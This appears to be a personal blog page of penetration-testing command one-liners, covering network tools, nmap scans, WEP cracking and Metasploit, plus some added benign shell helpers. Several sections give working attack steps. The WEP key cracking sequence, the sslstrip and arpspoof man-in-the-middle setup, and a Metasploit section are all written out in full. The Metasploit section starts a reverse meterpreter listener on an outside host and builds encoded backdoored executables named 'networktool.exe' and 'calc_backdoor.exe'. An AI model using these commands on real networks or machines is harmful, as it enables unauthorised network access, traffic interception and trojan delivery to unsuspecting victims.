one-liners

Random collection of CLI one-liners & tools, for the times I forget & need prompting again.

–ONLINE TOOLS–
IPTools
FastNetTools
GRC Passwords
Robtex
Pingdom – Full Page Test
Site-Perf – Full Page Test
Web Page Analyzer
Webpagetest

Online Scanners (HackerTarget.com)

ExploitDB
GoogleDorks

CIDR NetCalc

–PASSWORD KEEPERS–
LastPass
KeePass (Windows)
KeePassX (Mac / Linux)

–PASSWORD HASHES–
http://www.lmcrack.com/

–APP TOOLS–
Portable Apps
HFS (HTTP File Server) – Portable HTTP server for Windows
Maltego
HttpWatch – debug & troubleshoot web page load times

–NETWORKING–
*Random MAC (bring the interface down first, e.g. ifconfig wlan0 down; macchanger will not change the MAC of an interface that is up. -A picks a random vendor-prefixed MAC, -r a fully random one):
macchanger -A wlan0
ifconfig wlan0 up
*Monitor mode, sniff, then drop monitor mode:
airmon-ng start wlan0
airodump-ng mon0
airmon-ng stop wlan0
*Back to a managed client (values in <> are placeholders):
ifconfig wlan0 up
iwconfig wlan0 mode managed
iwconfig wlan0 ap <BSSID>
iwconfig wlan0 channel 11
iwconfig wlan0 essid <ESSID> key <WEP-KEY>
dhclient wlan0
*Share the link out over eth0: enable forwarding (not persistent across reboots), then NAT the 10.0.1.0/24 side:
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -s 10.0.1.0/24 -o eth0 -j MASQUERADE
*Vista interface MTU (from an elevated command prompt)
To see what interfaces you have on your computer, type
netsh interface ipv4 show subinterfaces
To change the MTU, type
netsh interface ipv4 set subinterface "Local Area Connection" mtu=nnnn store=persistent
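As an added example (not from the original page), a POSIX shell function that makes a random MAC without macchanger, and a checker for the two bits that matter: the first octet's bit 0 must be clear (unicast) and bit 1 set (locally administered), otherwise the address collides with the vendor-assigned space or is a multicast address some drivers refuse. The function names `random_mac` and `mac_is_laa_unicast` are chosen here.

```shell
#!/bin/sh
# Added example: generate a random locally-administered unicast MAC and verify
# the I/G (bit 0, 0 = unicast) and U/L (bit 1, 1 = locally administered) flags
# of the first octet. Function names are chosen for this example.

# random_mac: six bytes from the kernel CSPRNG, first octet masked so the
# result is unicast and locally administered. Prints aa:bb:cc:dd:ee:ff.
random_mac() {
    # od prints the bytes as decimal values; word splitting loads them into $1..$6
    set -- $(od -An -N6 -tu1 /dev/urandom)
    first=$(( ($1 & 254) | 2 ))   # clear the multicast bit, set the local bit
    printf '%02x:%02x:%02x:%02x:%02x:%02x\n' "$first" "$2" "$3" "$4" "$5" "$6"
}

# mac_is_laa_unicast MAC: returns 0 if MAC is six lowercase hex octets separated
# by colons, is unicast, and is locally administered; 1 otherwise.
mac_is_laa_unicast() {
    mac=$1
    case $mac in
        [0-9a-f][0-9a-f]:[0-9a-f][0-9a-f]:[0-9a-f][0-9a-f]:[0-9a-f][0-9a-f]:[0-9a-f][0-9a-f]:[0-9a-f][0-9a-f]) ;;
        *) return 1 ;;
    esac
    first=$(( 0x${mac%%:*} ))              # first octet as an integer
    [ $(( first & 1 )) -eq 0 ] && [ $(( first & 2 )) -eq 2 ]
}

# usage (as root): MAC=$(random_mac); ifconfig wlan0 down; ifconfig wlan0 hw ether "$MAC"; ifconfig wlan0 up
```

The same two bits explain why a vendor MAC such as 00:1D:58:81:A2:54 fails the check: it is globally administered, which is exactly what a defender's OUI lookup keys on.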

–WEP CRACKING–
airmon-ng start wlan0
airodump-ng mon0
*Capture (chan 6, write to capfile, --bssid = MAC of the access point so only its traffic is kept, interface)
airodump-ng -c 6 -w capfile --bssid 00:1D:58:81:A2:54 mon0
*Fake auth (after setting the channel with iwconfig; -h is your own wireless MAC, -e the ESSID):
aireplay-ng -1 0 -a 00:1D:58:81:A2:54 -h 00:11:22:33:44:55 -e WEPNETWORK mon0
*Force IV generation by replaying captured ARP requests (the fake auth above must still hold):
aireplay-ng -3 -b 00:1D:58:81:A2:54 -h 00:11:22:33:44:55 mon0
*Crack the key after enough IVs (the #Data column in airodump) are collected; airodump -w capfile writes capfile-01.cap
aircrack-ng capfile-01.cap

–NMAP–
*NSE scripts live here (BackTrack path); <target> below is a placeholder
cd /usr/share/nmap/scripts/
*Banner grab on the ports version detection finds open
nmap -sV --script=banner <target>
*SMB checks (smb-check-vulns.nse was removed from later Nmap releases; the smb-vuln-* scripts replace it)
nmap --script smb-check-vulns.nse -p445 192.168.0.141
sudo nmap -sU -sS --script smb-check-vulns.nse -p U:137,T:139 <target>
nmap --script smb-enum-shares.nse -p445 <target>
sudo nmap -sU -sS --script smb-enum-shares.nse -p U:137,T:139 <target>

*Single-port checks with host discovery skipped (-PN, spelled -Pn in newer Nmap). A U: port spec only gets scanned with -sU, which needs root, hence the sudo on the second and third:
nmap -v -p U:1111 -PN <target>
sudo nmap -v -sU -p U:1111 -PN <target>
sudo nmap -v -sU -p U:161 -PN <target>

*Version detection on one port, aggressive scan of one host, ping sweep (-sP is -sn in newer Nmap):
nmap -sV -p 80 192.168.0.1
nmap -v -A -PN 192.168.2.6
nmap -sP 10.1.1.1-255

–SSLSTRIP–
*sslstrip 0.7 is Python 2. It proxies plaintext HTTP and rewrites the https links in it, so port 80 (not 443) is redirected to its listener (default port 10000). <victim>, <gateway> and <logfile> are placeholders
cd scripts/sslstrip/sslstrip-0.7
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
echo 1 > /proc/sys/net/ipv4/ip_forward
python sslstrip.py -f -w <logfile>
arpspoof -i eth0 -t <victim> <gateway>

–ETTERCAP–
*Spoofed DNS answers used by the dns_spoof plugin
vi /usr/share/ettercap/etter.dns
*Compile a filter script into the binary form ettercap loads with -F
etterfilter -o john.ef etter.filter
*Main config: ec_uid/ec_gid (privilege drop) and the redir_command_on lines for SSL interception
/etc/etter.conf

–ARPSPOOF–
*Remember to turn on ip forwarding (echo 1 > /proc/sys/net/ipv4/ip_forward) or the victim loses connectivity
*Poison both directions: tell the victim 10.1.1.2 we are the gateway 10.1.1.1, then tell the gateway we are the victim
arpspoof -i wlan0 -t 10.1.1.2 10.1.1.1
arpspoof -i wlan0 -t 10.1.1.1 10.1.1.2

–MISC–
*Generate a file for network transfer tests etc (100 MiB; use if=/dev/urandom instead when the data must not be compressible)
dd if=/dev/zero of=bigfile bs=1024 count=102400

–MSF–
*Multi/handler as a background job that keeps listening after the first session (ExitOnSession false, exploit -j)
$ msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
msf exploit(handler) > set LPORT 8443
msf exploit(handler) > set LHOST metasploit.kicks-ass.net
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > exploit -j
[*] HTTPS listener started on http://metasploit.kicks-ass.net:8443/
[*] Starting the payload handler...

*Payload generation. msfpayload/msfencode were retired in 2015; msfvenom -p <payload> -f exe -x <template> -k -e <encoder> -i <count> covers the same ground
$ msfpayload windows/meterpreter/reverse_https LHOST=metasploit.kicks-ass.net LPORT=8443 R | msfencode -x calc.exe -t loop-vbs -o final.vbs

*Inject into a clean template exe, keep its original behaviour (-k), 5 encoder passes
root@bt:~# msfpayload windows/meterpreter/reverse_https LHOST=172.16.189.138 LPORT=443 R | msfencode -t exe -x /media/usb/backtrack/clean/calc.exe -k -o ~/networktool.exe -e x86/shikata_ga_nai -c 5
----------------------------------

# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=8443 R | ./msfencode -t exe -x calc.exe -k -o calc_backdoor.exe -e x86/shikata_ga_nai -c 5

–STUFF–
Clone a USB drive (image the device to a file, then write the image back)
dd if=/dev/sdb of=usbdrive.img conv=notrunc
*Restore. The loop sends SIGUSR1 every 5 s so GNU dd prints its progress, and ends on its own when dd exits (coreutils 8.24+ can use status=progress instead)
dd if=usbdrive.img of=/dev/sdb conv=notrunc & while killall -USR1 dd; do sleep 5; done
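The clone above is only as good as the copy, so the step a forensics or ops person wants after dd is a hash of both sides. Added example, not from the original page: a POSIX shell function that images a device (or file) with dd and returns success only when the SHA-256 of the image matches the source. It uses bs=512 with conv=noerror,sync, which keeps going past unreadable sectors but pads only a genuinely partial final block; a larger bs with conv=sync pads the tail of the image and the hashes then differ, which is the failure the check is there to catch. The names `image_and_verify` and `make_sample_image` are chosen here; `sha256sum` is coreutils (`shasum -a 256` on macOS).

```shell
#!/bin/sh
# Added example, not from the original page: image a device or file with dd,
# then refuse to trust the copy until its SHA-256 matches the source.
# Function names are chosen for this example.

# make_sample_image PATH BYTES: build a constructed "device" of random bytes to image.
make_sample_image() {
    head -c "$2" /dev/urandom > "$1"
}

# image_and_verify SRC DST
# Prints the SHA-256 both sides share and returns 0 when the image is verified.
# Returns 1 on a hash mismatch (padding, short read, bad media), 2 if dd itself fails.
image_and_verify() {
    src=$1; dst=$2
    # bs=512 matches the sector size, so conv=sync only pads a truly partial block;
    # conv=noerror keeps reading past bad sectors instead of aborting the image.
    # With a larger bs, conv=sync pads the tail of the image and the hashes differ.
    dd if="$src" of="$dst" bs=512 conv=noerror,sync 2>/dev/null || return 2
    src_sum=$(sha256sum "$src" | cut -d' ' -f1)   # coreutils; shasum -a 256 on macOS
    dst_sum=$(sha256sum "$dst" | cut -d' ' -f1)
    if [ "$src_sum" = "$dst_sum" ]; then
        printf '%s\n' "$src_sum"
        return 0
    fi
    printf 'hash mismatch: source %s, image %s\n' "$src_sum" "$dst_sum" >&2
    return 1
}

# usage (as root): image_and_verify /dev/sdb usbdrive.img && echo "image verified"
```

Record the printed hash with the image; it is what lets you show later that the file you analysed is the one you took.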

–PACKET CAPTURES–
Top talkers (busiest source addresses; the awk keeps the first four dot-separated fields of "IP a.b.c.d.port > ...", which drops the port but only works for IPv4):
tcpdump -tnn -c 20000 -i eth0 | awk -F "." '{print $1"."$2"."$3"."$4}' | sort | uniq -c | sort -nr | awk ' $1 > 100 '

*Same thing against a saved capture, five busiest sources:
tcpdump -tnr PCAPFILE | awk -F '.' '{print $1"."$2"."$3"."$4}' | sort | uniq -c | sort -n | tail -n 5
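The dot-splitting above breaks on three things a real capture contains: ICMP lines have no port (so "a.b.c.d" loses its last octet), IPv6 lines print as "host.port" with colons in the host, and ARP lines are not IP at all. Added example, not from the original page: a shell function that takes `tcpdump -tnn` output on stdin and counts sources correctly for all of those. The sample lines are constructed here to show each case; `top_talkers` and `SAMPLE_TCPDUMP` are names chosen for the example.

```shell
#!/bin/sh
# Added example, not from the original page: a top-talkers counter for
# tcpdump -tnn output that strips the port correctly for IPv4 and IPv6 and
# ignores non-IP lines (ARP etc.), which the plain dot-splitting one-liner does not.

# Constructed sample of tcpdump -tnn lines (no timestamps, numeric hosts and ports).
SAMPLE_TCPDUMP='IP 192.168.0.10.51234 > 93.184.216.34.443: Flags [S], seq 1, win 64240, length 0
IP 93.184.216.34.443 > 192.168.0.10.51234: Flags [S.], seq 2, ack 2, win 65535, length 0
IP 192.168.0.10.51235 > 93.184.216.34.443: Flags [S], seq 3, win 64240, length 0
IP 192.168.0.10 > 192.168.0.1: ICMP echo request, id 1, seq 1, length 64
IP 10.0.0.5.53 > 192.168.0.10.40000: 12345 1/0/0 A 93.184.216.34 (44)
IP6 fe80::1.546 > ff02::1:2.547: dhcp6 solicit
ARP, Request who-has 192.168.0.1 tell 192.168.0.10, length 28'

# top_talkers [N]: read tcpdump -tnn lines on stdin and print "count source" for
# the N (default 5) busiest source addresses, busiest first, ties broken by address.
top_talkers() {
    awk '
    $1 == "IP" || $1 == "IP6" {
        src = $2
        n = split(src, p, ".")
        if (src ~ /:/) {
            # IPv6: tcpdump appends ".port"; a bare IPv6 address contains no dot
            if (n == 2) src = p[1]
        } else if (n == 5) {
            # IPv4 with port: a.b.c.d.port becomes a.b.c.d; ICMP lines have only four fields
            src = p[1] "." p[2] "." p[3] "." p[4]
        }
        count[src]++
    }
    END { for (s in count) printf "%d %s\n", count[s], s }' |
    LC_ALL=C sort -k1,1nr -k2,2 | head -n "${1:-5}"
}

# usage: tcpdump -tnn -c 20000 -i eth0 | top_talkers 10
#        tcpdump -tnr PCAPFILE | top_talkers
```

The LC_ALL=C on sort keeps the tie-break order stable across locales; without it some locales ignore punctuation when comparing addresses.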


One response

19 11 2010
sLiPpErYh4x0r

I think this is a good idea, I have the same basic file, a little more detailed… I may throw it up on my site as well.

Keep adding! 🙂
